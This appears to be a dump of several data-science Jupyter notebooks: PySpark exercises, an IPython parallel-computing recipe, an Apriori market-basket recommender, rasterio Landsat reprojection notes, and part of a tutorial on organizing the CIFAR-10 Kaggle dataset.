```
stocks.write.format("json").save("stocks.json")
!hadoop fs -ls -h stocks.json
```
Save in parquet format
```
stocks.write.format("parquet").save("stocks.parquet")
!hadoop fs -ls -h stocks.parquet
```
Observations
- CSV file format: 121 MB
- CSV gzip compressed: 45.3 MB
- Json uncompressed: 279.5 MB
- Parquet snappy compressed: 40 MB
# Exercise 8: Size of dataframe in cache
Cache stocks.csv as an RDD and as a DataFrame, and compare the memory utilization.
```
stocksRdd = sc.textFile("stocks")
stocksRdd.cache().count()
```
Check the Storage tab in the Spark Web UI. You can find the Spark Web UI URL as shown below.
```
sc.uiWebUrl
stocksDf = spark.read.option("header", True).option("inferSchema", True).csv("stocks")
stocksDf.cache()
stocksDf.count()
```
|
github_jupyter
|
spark.version
from pyspark.sql.functions import *
home_dir = "/user/cloudera/movielens/"
movies = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "movies.csv")
.cache()) # Keep the dataframe in memory for faster processing
movies.printSchema()
movies.dtypes
movies.show(5)
movies.count()
ratings = (spark.read.format("csv")
.options(header = True, inferSchema = True)
.load(home_dir + "ratings.csv")
.persist())
ratings.printSchema()
ratings.show(5)
ratings.count()
ratings.groupBy("movieId", "userId").count().filter("count != 1").show()
ratings_agg = (ratings
.groupBy(col("movieId"))
.agg(
count(col("movieId")).alias("count"),
avg(col("rating")).alias("avg_rating")
))
ratings_agg.show()
(ratings_agg
.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.filter("count > 100")
.orderBy(desc("avg_rating"))
.select("t1.movieId", "title", "avg_rating", "count")
.limit(10)
.show())
sql("show tables").show()
movies.createOrReplaceTempView("movies")
ratings.createOrReplaceTempView("ratings")
sql("show tables").show()
sql("""
select
t1.movieId,
t1.title,
avg(t2.rating) avg_rating,
count(1) rating_count
from movies t1 join ratings t2 on t1.movieId = t2.movieId
group by t1.movieId, t1.title
having rating_count >= 100
order by avg_rating desc
limit 10
""").show()
genre_avg_rating = (ratings.alias("t1")
.join(movies.alias("t2"), col("t1.movieId") == col("t2.movieId"))
.select(col("rating"), explode(split("genres", r"\|")).alias("genre"))
.groupBy(col("genre"))
.agg(count(col("genre")).alias("count"), avg("rating").alias("avg_rating"))
.orderBy(desc("avg_rating")))
genre_avg_rating.show()
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
df = genre_avg_rating.toPandas()
df.head()
df.plot("genre", "avg_rating", "bar", title = "Barplot of avg rating by genre")
stocks = (spark
.read
.format("csv")
.options(inferSchema = True, header = True)
.load("stocks")
.cache())
stocks.show()
stocks.printSchema()
stocks.withColumn("date", col("date").cast("date")).printSchema()
stocks = stocks.withColumn("date", col("date").cast("date"))
stocks.show()
stocks.orderBy(col("date").desc()).show(1)
stocks.createOrReplaceTempView("stocks")
stocks_last10 = sql("""
select
cast(t1.date as string),
t1.symbol,
t1.adjclose,
t1.row_num
from (select
*,
row_number() over (partition by symbol order by date desc) row_num
from stocks) t1 where t1.row_num <= 11
""")
stocks_last10.show()
stocks_pivot = stocks_last10.groupby("symbol").pivot("date").agg(max(col("adjclose")))
stocks_pivot.limit(10).toPandas()
columns = ["v" + str(i) for i in range(len(stocks_pivot.columns) - 1)]
columns.insert(0, "symbol")
columns
stocks_pivot = stocks_pivot.toDF(*columns)
stocks_pivot.limit(10).toPandas()
stocks_diff = stocks_pivot
for i in range(1, len(stocks_diff.columns) - 1):
stocks_diff = stocks_diff.withColumn(columns[i], col(columns[i]) - col(columns[i+1]))
stocks_diff = stocks_diff.drop(stocks_diff.columns[-1])
stocks_diff.limit(10).toPandas()
orders = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "orders")
.option("user", "root")
.option("password", "cloudera")
.load())
orders.show()
orders.write.format("parquet").mode("overwrite").save("orders")
customers = (spark
.read
.format("jdbc")
.option("url", "jdbc:mysql://localhost/retail_db")
.option("driver", "com.mysql.jdbc.Driver")
.option("dbtable", "customers")
.option("user", "root")
.option("password", "cloudera")
.load())
customers.show(5)
orders = spark.read.load("orders")
orders.show(6)
(orders.alias("t1")
.join(customers.alias("t2"), col("t1.order_customer_id") == col("t2.customer_id"))
.filter("t1.order_status == 'COMPLETE'")
.groupby("order_customer_id", "customer_fname", "customer_lname")
.count()
.orderBy(col("count").desc())
.show(10))
orders.write.mode("overwrite").saveAsTable("orders")
sql("show tables").show()
spark.table("orders").show(10)
sql("describe formatted orders").toPandas()
sql("drop table orders").show()
sfpd = (spark
.read
.format("csv")
.option("header", True)
.option("inferSchema", True)
.load("sfpd")
)
sfpd.printSchema()
sfpd.limit(5).toPandas() # Using a pandas dataframe only for better tabular display
sfpd.rdd.getNumPartitions()
type(sfpd.first())
categories = sfpd.select("Category").distinct().rdd.map(lambda r: r.Category)
print(categories.collect())
categories_count = categories.count()
categories_count
category_counts = sfpd.groupBy("Category").count().orderBy(col("count").desc())
category_counts.show(categories_count, False)
category_counts.toPandas().set_index("Category").plot.barh(figsize = (10, 15))
sfpd.select("date").show(10, False)
from datetime import datetime
s = "04/20/2005 12:00:00 AM"
d = datetime.strptime(s[:10], "%m/%d/%Y").date()
d
from datetime import datetime
def parse_date(s):
return datetime.strptime(s[:10], "%m/%d/%Y").date()
parse_date("04/20/2005 12:00:00 AM")
from pyspark.sql.types import DateType
spark.udf.register("parse_date", parse_date, DateType())
sfpd.select(expr("date"), expr("parse_date(`date`)")).show(10, False)
sfpd_clean = sfpd.withColumn("date", expr("parse_date(date)"))
sfpd_clean.limit(10).toPandas()
CREATE EXTERNAL TABLE `weblogs`(
`host` string COMMENT 'Host',
`identity` string COMMENT 'User Identity',
`user` string COMMENT 'User identifier',
`time` string COMMENT 'Date time of access',
`request` string COMMENT 'Http request',
`status` string COMMENT 'Http status',
`size` string COMMENT 'Http response size',
`referrer` string COMMENT 'Referrer url',
`useragent` string COMMENT 'Web client agent')
ROW FORMAT SERDE
'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
'input.regex'='(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})? (\\S+) (\\S+) (\\[.+?\\]) \"(.*?)\" (\\d{3}) (\\S+) \"(.*?)\" \"(.*?)\"',
'output.format.string'='%1$s %2$s %3$s %4$s %5$s %6$s %7$s %8$s %9$s')
STORED AS INPUTFORMAT
'org.apache.hadoop.mapred.TextInputFormat'
OUTPUTFORMAT
'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION
'/user/cloudera/weblogs';
sql("show tables").show()
weblogs = spark.table("weblogs")
weblogs.limit(10).toPandas()
weblogs.count()
weblogs_clean = weblogs.withColumn("time_clean", expr(r"from_unixtime(UNIX_TIMESTAMP(TIME, '[dd/MMM/yyyy:HH:mm:ss Z]'))"))
weblogs_clean.select("time", "time_clean").show(10, False)
(weblogs_clean
.withColumn("year", expr("year(time_clean)"))
.withColumn("month", expr("month(time_clean)"))
.write
.mode("overwrite")
.partitionBy("year", "month")
.save("weblogs-partitioned"))
weblogs_partitioned = spark.read.load("weblogs-partitioned")
weblogs_partitioned.printSchema()
weblogs_partitioned.count()
from random import random
rdd = sc.parallelize([random() for _ in range(10)])
rdd.collect()
from pyspark.sql import Row
rddRow = rdd.map(lambda f: Row(f))
spark.createDataFrame(rddRow).toDF("col1").show()
rddRow = rdd.map(lambda f: Row(col1 = f))
df = spark.createDataFrame(rddRow)
df.show()
# Schema created by schema inferencing
rdd = sc.parallelize([
Row(c1 = 1.0, c2 = None, c3 = None),
Row(c1 = None, c2= "Apple", c3 = None)])
df = spark.createDataFrame(rdd, samplingRatio=1.0) # samplingRatio = 1 forces to see all records
df.printSchema()
from pyspark.sql.types import *
schema = StructType([
StructField("c1", FloatType()),
StructField("c2", StringType()),
StructField("c3", DateType()),
])
df = spark.createDataFrame(rdd, schema)
df.printSchema()
df.show()
moviesRdd = sc.textFile("movielens/movies.csv")
moviesRdd.take(10)
moviesRdd.filter(lambda line: len(line.split(",")) != 3).take(10)
from io import StringIO
import csv
from pyspark.sql.types import Row
def parse_movie(line):
tokens = [v for v in csv.reader(StringIO(line), delimiter=',')][0]
fields = tuple(tokens)
return Row(*tokens)
moviesCleanRdd = (moviesRdd
.filter(lambda line: not line.startswith("movieId"))
.map(parse_movie)
)
df = moviesCleanRdd.toDF().toDF("movieId", "title", "genre")
df.show(10, False)
schema = StructType([
StructField("movieId", StringType()),
StructField("title", StringType()),
StructField("genres", StringType()),
])
spark.createDataFrame(moviesCleanRdd, schema).show(10, False)
stocks = (spark
.read
.option("header", True)
.option("inferSchema", True)
.csv("stocks"))
!hadoop fs -ls -h stocks
(stocks
.write
.format("csv")
.option("compression", "gzip")
.option("header", True)
.save("stocks.csv.gz"))
!hadoop fs -ls -h stocks.csv.gz
stocks.write.format("json").save("stocks.json")
!hadoop fs -ls -h stocks.json
stocks.write.format("parquet").save("stocks.parquet")
!hadoop fs -ls -h stocks.parquet
stocksRdd = sc.textFile("stocks")
stocksRdd.cache().count()
sc.uiWebUrl
stocksDf = spark.read.option("header", True).option("inferSchema", True).csv("stocks")
stocksDf.cache()
stocksDf.count()
| 0.45302 | 0.981788 |
> This is one of the 100 recipes of the [IPython Cookbook](http://ipython-books.github.io/), the definitive guide to high-performance scientific computing and data science in Python.
# 5.10. Interacting with asynchronous parallel tasks in IPython
You need to start IPython engines (see previous recipe). The simplest option is to launch them from the *Clusters* tab in the notebook dashboard. In this recipe, we use four engines.
1. Let's import a few modules.
```
import time
import sys
from IPython import parallel
from IPython.display import clear_output, display
from IPython.html import widgets
```
2. We create a Client.
```
rc = parallel.Client()
```
3. Now, we create a load balanced view on the IPython engines.
```
view = rc.load_balanced_view()
```
4. We define a simple function for our parallel tasks.
```
def f(x):
import time
time.sleep(.1)
return x*x
```
5. We will run this function on 100 integer numbers in parallel.
```
numbers = list(range(100))
```
6. We execute `f` on our list `numbers` in parallel across all of our engines, using `map_async()`. This function immediately returns an `AsyncResult` object, which allows us to interactively retrieve information about the tasks.
```
ar = view.map_async(f, numbers)
```
7. This object has a `metadata` attribute, a list of dictionaries for all engines. We can get the date of submission and completion, the status, the standard output and error, and other information.
```
ar.metadata[0]
```
8. Iterating over the `AsyncResult` instance works normally; the iteration progresses in real-time while the tasks are being completed.
```
for _ in ar:
print(_, end=', ')
```
9. Now, we create a simple progress bar for our asynchronous tasks. The idea is to create a loop that polls for the tasks' status every second. An `IntProgressWidget` widget is updated in real-time and shows the progress of the tasks.
```
def progress_bar(ar):
# We create a progress bar.
w = widgets.IntProgressWidget()
# The maximum value is the number of tasks.
w.max = len(ar.msg_ids)
# We display the widget in the output area.
display(w)
# Repeat every second:
while not ar.ready():
# Update the widget's value with the
# number of tasks that have finished
# so far.
w.value = ar.progress
time.sleep(1)
w.value = w.max
ar = view.map_async(f, numbers)
progress_bar(ar)
```
10. Finally, it is easy to debug a parallel task on an engine. We can launch a Qt client on the remote kernel by calling `%qtconsole` within a `%%px` cell magic.
```
%%px -t 0
%qtconsole
```
The Qt console allows us to inspect the remote namespace for debugging or analysis purposes.
> You'll find all the explanations, figures, references, and much more in the book (to be released later this summer).
> [IPython Cookbook](http://ipython-books.github.io/), by [Cyrille Rossant](http://cyrille.rossant.net), Packt Publishing, 2014 (500 pages).
|
github_jupyter
|
import time
import sys
from IPython import parallel
from IPython.display import clear_output, display
from IPython.html import widgets
rc = parallel.Client()
view = rc.load_balanced_view()
def f(x):
import time
time.sleep(.1)
return x*x
numbers = list(range(100))
ar = view.map_async(f, numbers)
ar.metadata[0]
for _ in ar:
print(_, end=', ')
def progress_bar(ar):
# We create a progress bar.
w = widgets.IntProgressWidget()
# The maximum value is the number of tasks.
w.max = len(ar.msg_ids)
# We display the widget in the output area.
display(w)
# Repeat every second:
while not ar.ready():
# Update the widget's value with the
# number of tasks that have finished
# so far.
w.value = ar.progress
time.sleep(1)
w.value = w.max
ar = view.map_async(f, numbers)
progress_bar(ar)
%%px -t 0
%qtconsole
| 0.23634 | 0.960584 |
```
import os
project_name = "reco-tut-mba"; branch = "main"; account = "sparsh-ai"
project_path = os.path.join('/content', project_name)
if not os.path.exists(project_path):
!cp /content/drive/MyDrive/mykeys.py /content
import mykeys
!rm /content/mykeys.py
path = "/content/" + project_name;
!mkdir "{path}"
%cd "{path}"
import sys; sys.path.append(path)
!git config --global user.email "[email protected]"
!git config --global user.name "reco-tut"
!git init
!git remote add origin https://"{mykeys.git_token}":[email protected]/"{account}"/"{project_name}".git
!git pull origin "{branch}"
!git checkout main
else:
%cd "{project_path}"
import sys
sys.path.insert(0,'./code')
import numpy as np
import pandas as pd
# local modules
from apriori import apriori
df = pd.read_csv('./data/grocery.csv', header=None)
df.head(2)
df.shape
!head -20 ./data/grocery.csv
transactions = []
list_of_products=[]
basket=[]
totalcol = df.shape[1]
for i in range(0, len(df)):
cart = []
for j in range(0,totalcol):
if str(df.values[i,j] ) != "nan":
cart.append(str(df.values[i,j]))
if str(df.values[i,j]) not in list_of_products:
list_of_products.append(str(df.values[i,j]))
transactions.append(cart)
', '.join(list_of_products)
[', '.join(x) for x in transactions[:10]]
rules = apriori(transactions, min_support = 0.003, min_confidence = 0.04, min_lift = 3)
results = list(rules)
results
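# recommendation: match the first item of each mined rule against the products
# in the basket; on a match, record the rule details and recommend the second item.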
def recommendation(basket):
recommendations=[]
prints = []
for item in results:
pair = item[0]
items = [x for x in pair]
for product in basket:
if items[0]==product:
prints.append('Rule: {} -> {}'.format(items[0],items[1]))
prints.append('Support: {}'.format(item[1]))
prints.append('Confidence: {}'.format(str(item[2][0][2])))
prints.append('{}'.format('-'*50))
if items[1] not in recommendations:
recommendations.append(items[1])
return recommendations, prints
def recommend_randomly(nrec=2):
count = 0
while True:
basket = np.random.choice(list_of_products,5)
recs, prints = recommendation(basket)
if recs:
count+=1
print('\n{}\n'.format('='*100))
print('Basket:\n\t{}'.format('\n\t'.join(list(basket))))
print('\nRecommendation:\n\t{}'.format('\n\t'.join(list(recs))))
print('\n{}\n'.format('='*100))
print('\n'.join(prints))
if count>=nrec:
break
recommend_randomly()
!git status
!git add . && git commit -m 'commit' && git push origin main
!git push origin main
%%writefile README.md
# reco-tut-mba
This repository contains tutorials related to Market Basket Analysis for Recommenders.
```
|
github_jupyter
|
import os
project_name = "reco-tut-mba"; branch = "main"; account = "sparsh-ai"
project_path = os.path.join('/content', project_name)
if not os.path.exists(project_path):
!cp /content/drive/MyDrive/mykeys.py /content
import mykeys
!rm /content/mykeys.py
path = "/content/" + project_name;
!mkdir "{path}"
%cd "{path}"
import sys; sys.path.append(path)
!git config --global user.email "[email protected]"
!git config --global user.name "reco-tut"
!git init
!git remote add origin https://"{mykeys.git_token}":[email protected]/"{account}"/"{project_name}".git
!git pull origin "{branch}"
!git checkout main
else:
%cd "{project_path}"
import sys
sys.path.insert(0,'./code')
import numpy as np
import pandas as pd
# local modules
from apriori import apriori
df = pd.read_csv('./data/grocery.csv', header=None)
df.head(2)
df.shape
!head -20 ./data/grocery.csv
transactions = []
list_of_products=[]
basket=[]
totalcol = df.shape[1]
for i in range(0, len(df)):
cart = []
for j in range(0,totalcol):
if str(df.values[i,j] ) != "nan":
cart.append(str(df.values[i,j]))
if str(df.values[i,j]) not in list_of_products:
list_of_products.append(str(df.values[i,j]))
transactions.append(cart)
', '.join(list_of_products)
[', '.join(x) for x in transactions[:10]]
rules = apriori(transactions, min_support = 0.003, min_confidence = 0.04, min_lift = 3)
results = list(rules)
results
def recommendation(basket):
recommendations=[]
prints = []
for item in results:
pair = item[0]
items = [x for x in pair]
for product in basket:
if items[0]==product:
prints.append('Rule: {} -> {}'.format(items[0],items[1]))
prints.append('Support: {}'.format(item[1]))
prints.append('Confidence: {}'.format(str(item[2][0][2])))
prints.append('{}'.format('-'*50))
if items[1] not in recommendations:
recommendations.append(items[1])
return recommendations, prints
def recommend_randomly(nrec=2):
count = 0
while True:
basket = np.random.choice(list_of_products,5)
recs, prints = recommendation(basket)
if recs:
count+=1
print('\n{}\n'.format('='*100))
print('Basket:\n\t{}'.format('\n\t'.join(list(basket))))
print('\nRecommendation:\n\t{}'.format('\n\t'.join(list(recs))))
print('\n{}\n'.format('='*100))
print('\n'.join(prints))
if count>=nrec:
break
recommend_randomly()
!git status
!git add . && git commit -m 'commit' && git push origin main
!git push origin main
%%writefile README.md
# reco-tut-mba
This repository contains tutorials related to Market Basket Analysis for Recommenders.
| 0.069431 | 0.109563 |
```
!pip install rasterio
import rasterio
from matplotlib import pyplot as plt
url = r'https://s3-us-west-2.amazonaws.com/landsat-pds/c1/L8/009/029/LC08_L1TP_009029_20210111_20210111_01_RT/LC08_L1TP_009029_20210111_20210111_01_RT_B2.TIF'
src = rasterio.open(url)
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
import numpy as np
import rasterio
from rasterio.warp import calculate_default_transform, reproject, Resampling
# dst_crs = 'EPSG:4326'
dst_crs = 'EPSG:3857' # web mercator
with rasterio.open(url) as src:
transform, width, height = calculate_default_transform(
src.crs, dst_crs, src.width, src.height, *src.bounds)
kwargs = src.meta.copy()
kwargs.update({
'crs': dst_crs,
'transform': transform,
'width': width,
'height': height
})
with rasterio.open('testLandsat.tif', 'w', **kwargs) as dst:
for i in range(1, src.count + 1):
reproject(
source=rasterio.band(src, i),
destination=rasterio.band(dst, i),
src_transform=src.transform,
src_crs=src.crs,
dst_transform=transform,
dst_crs=dst_crs,
resampling=Resampling.nearest)
src = rasterio.open('testLandsat.tif')
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
#the below landsat image has been reprojected to web mercator!
!pip install -U rio-tiler
from rio_tiler.io import COGReader
with COGReader("testLandsat.tif") as image:
# img = image.tile(0, 0, 0)
img = image.tile(326, 368, 10) # read mercator tile z-x-y
# img = image.part(bbox) # read the data intersecting a bounding box
# img = image.feature(geojson_feature) # read the data intersecting a geojson feature
# img = image.point(lon,lat)
plt.imshow(img.data[0,:,:])
plt.show()
# the below is a landsat image in web mercator snapped to a slippy tile!
```
### The following are notes and chaos
```
!pip install pyproj
from pyproj import Transformer
dst_crs = 'EPSG:3857' # web mercator
from_crs = 'EPSG:4326' # wgs84
from_crs = 'EPSG:32620'  # WGS 84 / UTM zone 20N
transformer = Transformer.from_crs(from_crs, dst_crs, always_xy=True)
transformer.transform(-80, 50)
# (571666.4475041276, 5539109.815175673)
src.bounds
src.crs
import math
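# tile_from_coords: the standard OSM "slippy map" formula that converts a
# lat/lon pair and zoom level into the (x, y, z) indices of the containing tile.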
def tile_from_coords(lat, lon, zoom):
lat_rad = math.radians(lat)
n = 2.0 ** zoom
tile_x = int((lon + 180.0) / 360.0 * n)
tile_y = int((1.0 - math.asinh(math.tan(lat_rad)) / math.pi) / 2.0 * n)
return [tile_x, tile_y, zoom]
tile_from_coords(44.88,-65.16,10)
src2 = rasterio.open(url)
print(src2.crs)
print(src2.crs.wkt)
print(src2.transform)
plt.imshow(src2.read(1)[::4,::4],vmin=-10)
plt.show()
img2 = src2.read(1)
img2.shape
len(img2.shape)
def image_from_features(features, width):
length,depth = features.shape
height = int(length/width)
img = features.reshape(width,height,depth)
return img
def features_from_image(img):
if len(img.shape)==2:
features = img.flatten()
else:
features = img.reshape(-1, img.shape[2])
return features
feat2 = features_from_image(img2)
xImg = np.zeros(img2.shape)
yImg = np.zeros(img2.shape)
src2.bounds.left
xvals = np.linspace(start=src2.bounds.left, stop=src2.bounds.right, num=img2.shape[1], endpoint=True, retstep=False, dtype=None, axis=0)
yvals = np.linspace(start=src2.bounds.bottom, stop=src2.bounds.top, num=img2.shape[0], endpoint=True, retstep=False, dtype=None, axis=0)
xygrid = np.meshgrid(xvals, yvals)
scale = lambda x: src2.bounds.left+x*3
scale(xImg)
xImg2 = np.tile(xvals,(img2.shape))
# https://trac.osgeo.org/gdal/wiki/CloudOptimizedGeoTIFF
cogurl = r'http://even.rouault.free.fr/gtiff_test/S2A_MSIL1C_20170102T111442_N0204_R137_T30TXT_20170102T111441_TCI_cloudoptimized_2.tif'
src3 = rasterio.open(cogurl)
plt.imshow(src3.read(1)[::4,::4],vmin=-10)
plt.show()
```
|
github_jupyter
|
!pip install rasterio
import rasterio
from matplotlib import pyplot as plt
url = r'https://s3-us-west-2.amazonaws.com/landsat-pds/c1/L8/009/029/LC08_L1TP_009029_20210111_20210111_01_RT/LC08_L1TP_009029_20210111_20210111_01_RT_B2.TIF'
src = rasterio.open(url)
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
import numpy as np
import rasterio
from rasterio.warp import calculate_default_transform, reproject, Resampling
# dst_crs = 'EPSG:4326'
dst_crs = 'EPSG:3857' # web mercator
with rasterio.open(url) as src:
transform, width, height = calculate_default_transform(
src.crs, dst_crs, src.width, src.height, *src.bounds)
kwargs = src.meta.copy()
kwargs.update({
'crs': dst_crs,
'transform': transform,
'width': width,
'height': height
})
with rasterio.open('testLandsat.tif', 'w', **kwargs) as dst:
for i in range(1, src.count + 1):
reproject(
source=rasterio.band(src, i),
destination=rasterio.band(dst, i),
src_transform=src.transform,
src_crs=src.crs,
dst_transform=transform,
dst_crs=dst_crs,
resampling=Resampling.nearest)
src = rasterio.open('testLandsat.tif')
print(src.crs)
print(src.crs.wkt)
print(src.transform)
plt.imshow(src.read(1)[::4,::4],vmin=-10)
plt.show()
#the below landsat image has been reprojected to web mercator!
!pip install -U rio-tiler
from rio_tiler.io import COGReader
with COGReader("testLandsat.tif") as image:
# img = image.tile(0, 0, 0)
img = image.tile(326, 368, 10) # read mercator tile z-x-y
# img = image.part(bbox) # read the data intersecting a bounding box
# img = image.feature(geojson_feature) # read the data intersecting a geojson feature
# img = image.point(lon,lat)
plt.imshow(img.data[0,:,:])
plt.show()
# the below is a landsat image in web mercator snapped to a slippy tile!
!pip install pyproj
from pyproj import Transformer
dst_crs = 'EPSG:3857' # web mercator
from_crs = 'EPSG:4326' # wgs84
from_crs = 'EPSG:32620'  # WGS 84 / UTM zone 20N
transformer = Transformer.from_crs(from_crs, dst_crs, always_xy=True)
transformer.transform(-80, 50)
# (571666.4475041276, 5539109.815175673)
src.bounds
src.crs
import math
def tile_from_coords(lat, lon, zoom):
lat_rad = math.radians(lat)
n = 2.0 ** zoom
tile_x = int((lon + 180.0) / 360.0 * n)
tile_y = int((1.0 - math.asinh(math.tan(lat_rad)) / math.pi) / 2.0 * n)
return [tile_x, tile_y, zoom]
tile_from_coords(44.88,-65.16,10)
src2 = rasterio.open(url)
print(src2.crs)
print(src2.crs.wkt)
print(src2.transform)
plt.imshow(src2.read(1)[::4,::4],vmin=-10)
plt.show()
img2 = src2.read(1)
img2.shape
len(img2.shape)
def image_from_features(features, width):
length,depth = features.shape
height = int(length/width)
img = features.reshape(width,height,depth)
return img
def features_from_image(img):
if len(img.shape)==2:
features = img.flatten()
else:
features = img.reshape(-1, img.shape[2])
return features
feat2 = features_from_image(img2)
xImg = np.zeros(img2.shape)
yImg = np.zeros(img2.shape)
src2.bounds.left
xvals = np.linspace(start=src2.bounds.left, stop=src2.bounds.right, num=img2.shape[1], endpoint=True, retstep=False, dtype=None, axis=0)
yvals = np.linspace(start=src2.bounds.bottom, stop=src2.bounds.top, num=img2.shape[0], endpoint=True, retstep=False, dtype=None, axis=0)
xygrid = np.meshgrid(xvals, yvals)
scale = lambda x: src2.bounds.left+x*3
scale(xImg)
xImg2 = np.tile(xvals,(img2.shape))
# https://trac.osgeo.org/gdal/wiki/CloudOptimizedGeoTIFF
cogurl = r'http://even.rouault.free.fr/gtiff_test/S2A_MSIL1C_20170102T111442_N0204_R137_T30TXT_20170102T111441_TCI_cloudoptimized_2.tif'
src3 = rasterio.open(cogurl)
plt.imshow(src3.read(1)[::4,::4],vmin=-10)
plt.show()
| 0.585575 | 0.572065 |
# Image Classification (CIFAR-10) on Kaggle
:label:`sec_kaggle_cifar10`
So far, we have been using Gluon's `data` package to directly obtain image datasets in the tensor format. In practice, however, image datasets often exist in the format of image files. In this section, we will start with the original image files and organize, read, and convert the files to the tensor format step by step.
We performed an experiment on the CIFAR-10 dataset in :numref:`sec_image_augmentation`.
This is an important data
set in the computer vision field. Now, we will apply the knowledge we learned in
the previous sections in order to participate in the Kaggle competition, which
addresses CIFAR-10 image classification problems. The competition's web address
is
> https://www.kaggle.com/c/cifar-10
:numref:`fig_kaggle_cifar10` shows the information on the competition's webpage. In order to submit the results, please register an account on the Kaggle website first.

:width:`600px`
:label:`fig_kaggle_cifar10`
First, import the packages or modules required for the competition.
```
import collections
from d2l import torch as d2l
import math
import torch
import torchvision
from torch import nn
import os
import pandas as pd
import shutil
```
## Obtaining and Organizing the Dataset
The competition data is divided into a training set and testing set. The training set contains $50,000$ images. The testing set contains $300,000$ images, of which $10,000$ images are used for scoring, while the other $290,000$ non-scoring images are included to prevent the manual labeling of the testing set and the submission of labeling results. The image formats in both datasets are PNG, with heights and widths of 32 pixels and three color channels (RGB). The images cover $10$ categories: planes, cars, birds, cats, deer, dogs, frogs, horses, boats, and trucks. The upper-left corner of :numref:`fig_kaggle_cifar10` shows some images of planes, cars, and birds in the dataset.
### Downloading the Dataset
After logging in to Kaggle, we can click on the "Data" tab on the CIFAR-10 image classification competition webpage shown in :numref:`fig_kaggle_cifar10` and download the dataset by clicking the "Download All" button. After unzipping the downloaded file in `../data`, and unzipping `train.7z` and `test.7z` inside it, you will find the entire dataset in the following paths:
* ../data/cifar-10/train/[1-50000].png
* ../data/cifar-10/test/[1-300000].png
* ../data/cifar-10/trainLabels.csv
* ../data/cifar-10/sampleSubmission.csv
Here the folders `train` and `test` contain the training and testing images respectively, `trainLabels.csv` has the labels for the training images, and `sampleSubmission.csv` is a sample submission file.
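If you prefer to script these steps from a notebook cell, the extraction can be done with the `7z` command-line tool; a minimal sketch (the archive name and output paths here are assumptions based on the layout above):
```
!7z x ../data/cifar-10.zip -o../data/cifar-10
!7z x ../data/cifar-10/train.7z -o../data/cifar-10
!7z x ../data/cifar-10/test.7z -o../data/cifar-10
```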
To make it easier to get started, we provide a small-scale sample of the dataset: it contains the first $1000$ training images and $5$ random testing images.
To use the full dataset of the Kaggle competition, you need to set the following `demo` variable to `False`.
```
#@save
d2l.DATA_HUB['cifar10_tiny'] = (d2l.DATA_URL + 'kaggle_cifar10_tiny.zip',
'2068874e4b9a9f0fb07ebe0ad2b29754449ccacd')
# If you use the full dataset downloaded for the Kaggle competition, set
# `demo` to False
demo = True
if demo:
data_dir = d2l.download_extract('cifar10_tiny')
else:
data_dir = '../data/cifar-10/'
```
### Organizing the Dataset
We need to organize datasets to facilitate model training and testing. Let us first read the labels from the csv file. The following function returns a dictionary that maps the filename without extension to its label.
```
#@save
def read_csv_labels(fname):
"""Read fname to return a name to label dictionary."""
with open(fname, 'r') as f:
# Skip the file header line (column name)
lines = f.readlines()[1:]
tokens = [l.rstrip().split(',') for l in lines]
return dict(((name, label) for name, label in tokens))
labels = read_csv_labels(os.path.join(data_dir, 'trainLabels.csv'))
print('# training examples:', len(labels))
print('# classes:', len(set(labels.values())))
```
Next, we define the `reorg_train_valid` function to segment the validation set from the original training set. The argument `valid_ratio` in this function is the ratio of the number of examples in the validation set to the number of examples in the original training set. In particular, let $n$ be the number of images of the class with the least examples, and $r$ be the ratio, then we will use $\max(\lfloor nr\rfloor,1)$ images for each class as the validation set. Let us use `valid_ratio=0.1` as an example. Since the original training set has $50,000$ images, there will be $45,000$ images used for training and stored in the path "`train_valid_test/train`" when tuning hyperparameters, while the other $5,000$ images will be stored as validation set in the path "`train_valid_test/valid`". After organizing the data, images of the same class will be placed under the same folder so that we can read them later.
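As a quick numeric illustration of that rule (the numbers here are made up rather than computed from the data):
```
import math
# With, say, n = 5000 images in the rarest class and valid_ratio = 0.1,
# each class contributes max(1, floor(5000 * 0.1)) = 500 validation images.
n, valid_ratio = 5000, 0.1
print(max(1, math.floor(n * valid_ratio)))  # 500
```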
```
#@save
def copyfile(filename, target_dir):
"""Copy a file into a target directory."""
os.makedirs(target_dir, exist_ok=True)
shutil.copy(filename, target_dir)
#@save
def reorg_train_valid(data_dir, labels, valid_ratio):
# The number of examples of the class with the least examples in the
# training dataset
n = collections.Counter(labels.values()).most_common()[-1][1]
# The number of examples per class for the validation set
n_valid_per_label = max(1, math.floor(n * valid_ratio))
label_count = {}
for train_file in os.listdir(os.path.join(data_dir, 'train')):
label = labels[train_file.split('.')[0]]
fname = os.path.join(data_dir, 'train', train_file)
# Copy to train_valid_test/train_valid with a subfolder per class
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'train_valid', label))
if label not in label_count or label_count[label] < n_valid_per_label:
# Copy to train_valid_test/valid
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'valid', label))
label_count[label] = label_count.get(label, 0) + 1
else:
# Copy to train_valid_test/train
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'train', label))
return n_valid_per_label
```
The `reorg_test` function below is used to organize the testing set to facilitate the reading during prediction.
```
#@save
def reorg_test(data_dir):
for test_file in os.listdir(os.path.join(data_dir, 'test')):
copyfile(os.path.join(data_dir, 'test', test_file),
os.path.join(data_dir, 'train_valid_test', 'test',
'unknown'))
```
Finally, we use a function to call the previously defined `read_csv_labels`, `reorg_train_valid`, and `reorg_test` functions.
```
def reorg_cifar10_data(data_dir, valid_ratio):
labels = read_csv_labels(os.path.join(data_dir, 'trainLabels.csv'))
reorg_train_valid(data_dir, labels, valid_ratio)
reorg_test(data_dir)
```
